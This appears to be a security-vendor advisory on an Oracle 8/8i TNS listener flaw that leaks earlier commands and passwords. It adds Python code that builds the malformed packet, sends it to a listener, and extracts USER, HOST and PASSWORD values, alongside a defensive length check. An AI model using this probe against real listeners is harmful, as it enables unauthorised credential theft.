Threat Finder

Threat ID
3
Threat Date
08/06/2007
Threat Name
TNS packet leaking
CVE Reference
CVE-NO-MATCH
CCE Reference
CCE-NO-MATCH
Risk
Medium
Database Type
No Application Type
Category
Unsupported
Versions
Oracle8 and Oracle 8i
Summary
A bug in the listener service causes a malformed listener command to return, as part of its reply, commands that other users submitted earlier. By reading those earlier commands, an attacker can learn usernames, client addresses and even the listener password.
Overview
Commands sent to the listener service can be leaked to other users. An unauthenticated user can query the listener and receive previously submitted commands, which may contain sensitive information such as:
- the listener password
- usernames
- client addresses

This attack works by sending a malformed command to the listener. The header of a listener packet carries a field that states the length of the command being sent. If the length claimed in the header is larger than the number of bytes actually sent, the listener reads past the end of the data it received and copies stale buffer contents into the reply it returns, including:
- previous commands
- the results of previous commands
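
The mechanism above, as an added example that is not part of the original advisory and is not tnscmd's own code: build_tns_connect produces a TNS CONNECT packet whose length fields either match the bytes sent or overstate them by claimed_extra bytes (the malformed case), is_length_inconsistent is the receiver-side check that a patched listener or an IDS rule in front of it should apply, and extract_leaked_fields picks the interesting keyword=value pairs out of a reply buffer. The 58-byte CONNECT header layout, the constant values in it, the default port 1521 and the SAMPLE_LEAKY_REPLY bytes are assumptions or constructed data, not captures from a real listener.

```python
import re
import socket
import struct

TNS_CONNECT = 1            # TNS packet type: CONNECT
TNS_PKT_HDR_LEN = 8        # length(2) checksum(2) type(1) reserved(1) hdr checksum(2)
TNS_CONNECT_HDR_LEN = 58   # offset at which connect data starts (assumed layout)


def build_tns_connect(connect_data: bytes, claimed_extra: int = 0) -> bytes:
    """Build a TNS CONNECT packet carrying `connect_data` (a listener command).

    With claimed_extra == 0 the length fields match the bytes sent. With
    claimed_extra > 0 the packet length and connect-data length are overstated
    by that many bytes, which is the malformed packet the advisory describes;
    the promised extra bytes are never transmitted.
    """
    cd_len = len(connect_data)
    actual_len = TNS_CONNECT_HDR_LEN + cd_len
    pkt_hdr = struct.pack(">HHBBH", actual_len + claimed_extra, 0, TNS_CONNECT, 0, 0)
    conn_hdr = struct.pack(
        ">HHHHHHHHHHIBBII8s",
        0x0136,                  # TNS version (assumed value)
        0x012C,                  # lowest compatible version (assumed value)
        0x0000,                  # service options
        0x0800,                  # session data unit size
        0x7FFF,                  # transport data unit size
        0x4F98,                  # NT protocol characteristics (assumed value)
        0x0000,                  # max packets before ack
        0x0100,                  # byte-order marker ("ones in one byte")
        cd_len + claimed_extra,  # length of connect data (overstated when malformed)
        TNS_CONNECT_HDR_LEN,     # offset of connect data from packet start
        0x00000800,              # max receivable connect data
        0x41, 0x41,              # connect flags 0 / 1 (assumed values)
        0, 0,                    # trace cross-facility items
        b"\x00" * 8,             # trace unique connection id
    )
    padding = b"\x00" * (TNS_CONNECT_HDR_LEN - TNS_PKT_HDR_LEN - len(conn_hdr))
    return pkt_hdr + conn_hdr + padding + connect_data


def parse_tns_header(pkt: bytes) -> dict:
    """Decode the 8-byte TNS packet header into its length and type."""
    if len(pkt) < TNS_PKT_HDR_LEN:
        raise ValueError("short TNS packet")
    length, _cksum, ptype, _rsv, _hcksum = struct.unpack(">HHBBH", pkt[:TNS_PKT_HDR_LEN])
    return {"length": length, "type": ptype}


def is_length_inconsistent(pkt: bytes) -> bool:
    """Receiver-side check: True when the header promises more bytes than arrived.

    A listener that rejects such packets instead of reading past the received
    data cannot leak stale buffer contents. Callers should pass one complete
    TNS packet as reassembled from the TCP stream.
    """
    hdr = parse_tns_header(pkt)
    if hdr["length"] > len(pkt):
        return True
    if hdr["type"] == TNS_CONNECT and len(pkt) >= 28:
        cd_len, cd_offset = struct.unpack(">HH", pkt[24:28])
        if cd_offset + cd_len > len(pkt):
            return True
    return False


LEAK_KEYS = re.compile(rb"\((USER|HOST|PROGRAM|PASSWORD)=([^()]*)\)")


def extract_leaked_fields(response: bytes) -> list:
    """Pull interesting TNS keyword=value pairs out of a reply buffer.

    A leaky listener answers with its normal reply followed by stale bytes from
    earlier commands; that is where USER=, HOST= and PASSWORD= values appear.
    Returns (key, value) pairs in order of appearance.
    """
    return [(k.decode(), v.decode(errors="replace")) for k, v in LEAK_KEYS.findall(response)]


def probe_listener(host: str, port: int = 1521, overstate: int = 256, timeout: float = 5.0) -> bytes:
    """Send one overstated CONNECT and return whatever the listener answers.
    Network code for use only against a listener you are authorised to test."""
    pkt = build_tns_connect(b"(CONNECT_DATA=(COMMAND=ping))", claimed_extra=overstate)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(pkt)
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)


# Constructed sample reply: a normal listener answer followed by stale bytes
# from an earlier lsnrctl session. Not real captured data.
SAMPLE_LEAKY_REPLY = (
    b"(DESCRIPTION=(TMP=)(VSNNUM=135290880)(ERR=0)(ALIAS=LISTENER))"
    b"\x00\x00"
    b"(CONNECT_DATA=(CID=(PROGRAM=lsnrctl)(HOST=dba-ws)(USER=oracle))"
    b"(COMMAND=status)(PASSWORD=changeme)(SERVICE=LISTENER))"
)

if __name__ == "__main__":
    honest = build_tns_connect(b"(CONNECT_DATA=(COMMAND=ping))")
    bad = build_tns_connect(b"(CONNECT_DATA=(COMMAND=ping))", claimed_extra=256)
    print("honest packet inconsistent?", is_length_inconsistent(honest))
    print("malformed packet inconsistent?", is_length_inconsistent(bad))
    print("fields recovered from reply:", extract_leaked_fields(SAMPLE_LEAKY_REPLY))
```

The honest and malformed packets are the same length on the wire; only the header's claims differ, which is why a check against the header alone cannot distinguish them and the receiver must compare the claim against the bytes it actually has.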

This attack can be mounted by any remote user who can send packets to the IP address and port of the listener. It cannot be mounted by an attacker outside your organization if a firewall properly blocks access to the listener port from untrusted networks; any host that can reach the port, including hosts on the internal network, can still mount it.

An attacker would use this vulnerability to collect information about the database. No authentication credentials are required to run this attack. An attacker would repeatedly run it over a period of days, collecting a list of users and client addresses and hoping to catch the database administrator connecting to the listener with the password.
References
http://www.jammed.com/~jwa/hacks/security/tnscmd/
http://www.jammed.com/~jwa/hacks/security/tnscmd/tns-advisory.txt
http://www.securiteam.com/tools/5TP0Q2K40Y.html
VMSKey
STIGID

Additional information including fix script information is available in the licensed versions of Application Security's DbProtect and AppDetectivePro solutions.
